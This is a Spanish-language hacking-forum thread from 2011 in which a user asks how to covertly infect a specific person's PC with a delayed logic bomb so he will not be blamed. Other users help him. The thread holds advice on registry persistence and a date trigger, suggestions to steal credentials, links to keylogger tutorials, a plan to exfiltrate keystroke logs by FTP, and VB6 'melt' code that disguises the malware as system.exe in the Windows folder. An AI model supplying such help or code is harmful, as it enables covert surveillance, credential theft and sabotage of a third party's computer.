elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Que hago?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Que hago?  (Leído 3,490 veces)
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Que hago?
« en: 7 Octubre 2011, 23:04 pm »

Pregunta: Tengo un trabajito, meter virus en un pc... es facil, pero para que no se de cuenta que fui yo, tiene que ser una muerte lenta...

La verdad no tengo idea, podria ponerle yo una fecha de 'detonacion', no?

Hace mucho habia visto algo que se llamaba algo asi como 'bomba logica' , puede ser? edit:esto es lo que busco

Que harian ustedes? saludos


« Última modificación: 7 Octubre 2011, 23:07 pm por nukje » En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Que hago?
« Respuesta #1 en: 7 Octubre 2011, 23:19 pm »

si puedes hacer eso, agregarte al registro y cada vez que se inicie verificar la fecha que le hayas indicado "explotar" :xD
y si es correcta hace su tarea ;)
pero porque destruir? y no mejor "mirar" ???
puedes hacerlo que te envie informacion sensible? :P


En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Que hago?
« Respuesta #2 en: 7 Octubre 2011, 23:22 pm »

mmm

stealer de msn (Solo guardadas :/ ) + romper

La verdad, mirar seria buena idea, pero con todo esto de los antivirus....

alguien sabe algo de algun stealer apra firefox? o chhrome, etc
« Última modificación: 7 Octubre 2011, 23:26 pm por nukje » En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Que hago?
« Respuesta #3 en: 7 Octubre 2011, 23:26 pm »

puedes hacerlo tipo keylogger sencillo :P
los AVs no los detectan la mayoria te lo digo por experiencia
aqui en el foro hay mucha informacion sobre crear keyloggers solo es de unos 10 min de buscar y empezar a codear :)

« Última modificación: 18 Octubre 2011, 21:14 pm por Raul100 » En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Que hago?
« Respuesta #4 en: 8 Octubre 2011, 00:05 am »

claro, con firefox me complique durante mucho tiempo, creo que el archivo con contraseñas era key3.dll o algo asi, y enrealidad no me acuerdo que problema habia tenido xDDDDDD

ahora estoy codeando un keylogger basico, + ftp



Gracias por los links, ahora los reviso ;)

Recuerdas esa API que te dice si se esta pulsando una tecla?
« Última modificación: 8 Octubre 2011, 00:59 am por raul338 » En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Que hago?
« Respuesta #5 en: 8 Octubre 2011, 00:34 am »

http://foro.elhacker.net/programacion_vb/vb6_creacion_de_un_keylogger_avanzado_hook-t264469.0.html
http://foro.elhacker.net/empty-t314315.0.html
http://foro.elhacker.net/empty-t264460.0.html
En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Que hago?
« Respuesta #6 en: 8 Octubre 2011, 04:25 am »

Estoy haciendo una especie de MELT

CODIGO

Código
  1. 'verifica si esta corriendo desde system.exe
  2. If App.path & "\" & App.EXEName & ".exe" = Environ("windir") & "\system.exe" Then
  3. 'si es asi abre otro formulario
  4. kg.Show
  5.  
  6. Else
  7. On Error Resume Next
  8. 'sino borra el system.exe (en caso de que exista)
  9. Kill Environ("windir") & "\system.exe"
  10. On Error GoTo error
  11. 'copia el .exe del que se esta corriendo a el directorio de windows con el nombre SYSTEM.exe - ACA ME DA ERROR, ME DICE FILE NOT FOUND
  12. FileCopy App.path & "\" & App.EXEName & ".exe", Environ("windir") & "\system.exe"
  13. 'abre el .exe creado
  14. Shell Environ("windir") & "\system.exe"
  15. Dim a As String
  16. a = App.path & "\" & App.EXEName & ".exe"
  17. 'copio la ruta del exe actual al portapapeles, y en el formulario kg esta el codigo KILL clipboard.gettext , enrealidad nose si esta parte esta bien, supongo que si, no llegue hasta aca!!!!!
  18. Clipboard.Clear
  19. Clipboard.SetText (a)
  20. End If
  21. Exit Sub
  22. error:
  23. MsgBox error, vbOKCancel
  24. End Sub
  25.  
  26.  

ME DA ERROR EN EL FILECOPY, 'not found'
lo solucione escribiendo devuelta (quedo igual :/ )


este melt que lleno la ver** ,
« Última modificación: 8 Octubre 2011, 04:43 am por nukje » En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Que hago?
« Respuesta #7 en: 8 Octubre 2011, 14:42 pm »

cobein tenia un modulo de melt. fijate
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Que hago?
« Respuesta #8 en: 8 Octubre 2011, 16:36 pm »

sisi despues de mil vueltas lo encontre!!!! y mira

http://cobein.com/wp/?p=207&cpage=1#comment-595

anoche intente bajarlo y no anda la pagina xDDDDDDDDD

El melt lo deje de lado, despues lo sigo...

Ahora estoy trabadicimo en otra parte!!!!!!

Veamos...

CODIGO:

Keylogger %100
Guardar log : %100
Codigo para subir a FTP: %100

Pero tengo un problema!!!

tengo los codigos pero nose como ordenarlos, osea...

Apenas se abre se genera el log y se activa el keylogger.

Pero.... cada cuanto tiempo subo el log al ftp???

Les digo la parte logica del FTP:

SUBE EL ARCHIVO LOG
BORRA EL LOG
BORRA EL BAT DL FTP

----

Pero si lo ponga para que suba el log cada 5 minutos, nose que onda, como tiene el mismo nombre no lo sube... asi que tengo que modificar para que el ArchivoLog se llame ArchivoLog+HORA.txt no asi no.

Como lo harian? El codigo esta, falta ordenarlo,
« Última modificación: 8 Octubre 2011, 16:48 pm por nukje » En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Que hago?
« Respuesta #9 en: 8 Octubre 2011, 18:24 pm »

mmm... yoquese, podes hacer algo como detectar el evento shutdown, cancelarlo, subir tu log (OLVIDATE DE BATCH, hacelo en vb) borrar el log y reactivar el apagado del equipo

o hacerlo cada tanto tiempo (un dia, 2 horas, una semana, imaginacion)
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
.img sin .cue....que hago?
Software
Sakura85 7 11,050 Último mensaje 31 Agosto 2004, 04:21 am
por khrisjian
¿que hago mal?
Software
benissa 2 1,817 Último mensaje 7 Junio 2005, 17:17 pm
por el-brujo
que hago con LOS.... DE ONO
Electrónica
mixi 1 2,338 Último mensaje 7 Febrero 2006, 10:26 am
por Bastian
que hago con una ip.
Hacking Wireless
aaroncxs 2 3,476 Último mensaje 13 Abril 2024, 03:14 am
por gmd32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines